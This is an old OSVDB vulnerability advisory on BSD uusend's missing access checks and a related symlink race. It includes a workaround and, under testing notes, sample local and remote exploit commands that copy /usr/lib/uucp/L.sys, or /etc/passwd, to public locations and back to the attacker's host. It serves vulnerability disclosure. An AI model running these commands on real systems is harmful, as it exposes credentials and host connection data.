BSD uusend Arbitrary Privileged Command Execution

1986-05-19T00:00:00
ID OSVDB:632
Type osvdb
Reporter Joe Angelo(), Romain Kang()
Modified 1986-05-19T00:00:00

Description

Vulnerability Description

BSD contains a flaw that may allow a malicious user to gain access to unauthorized privileges and/or cause an unauthorized information disclosure. The issue is triggered when uusend fails to perform access checking, such as check the USERFILE file or check file permissions, before transmitting UUCP owned files or other files; such as /usr/lib/uucp/L.sys or /etc/passwd. This flaw may lead to a loss of confidentiality and/or integrity.

Technical Description

A second vulnerability presents as a consequence of the primary vulnerability. A race condition exists when a malicious user (local) or malicious attacker (remote) causes uusend to write to uucp files, which have been replaced with symbolic links to arbitrary files.

Solution Description

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: make uusend setuid/setgid to an inactive account and protect /usr/lib/uucp files.

Short Description

BSD contains a flaw that may allow a malicious user to gain access to unauthorized privileges and/or cause an unauthorized information disclosure. The issue is triggered when uusend fails to perform access checking, such as check the USERFILE file or check file permissions, before transmitting UUCP owned files or other files; such as /usr/lib/uucp/L.sys or /etc/passwd. This flaw may lead to a loss of confidentiality and/or integrity.

Manual Testing Notes

Sample local exploit to obtain L.sys:

 uusend -m 666 /usr/lib/uucp/L.sys /usr/tmp/public

Sample remote exploit to obtain L.sys:

 uux target!uusend -m 666 /usr/lib/uucp/L.sys /tmp/public
 uucp target!/tmp/public local!/tmp/public

(both exploits work with /etc/passwd and any other uucp-readable file)

References:

Mail List Post: http://securitydigest.org/unix/archive/024 Mail List Post: http://securitydigest.org/unix/archive/029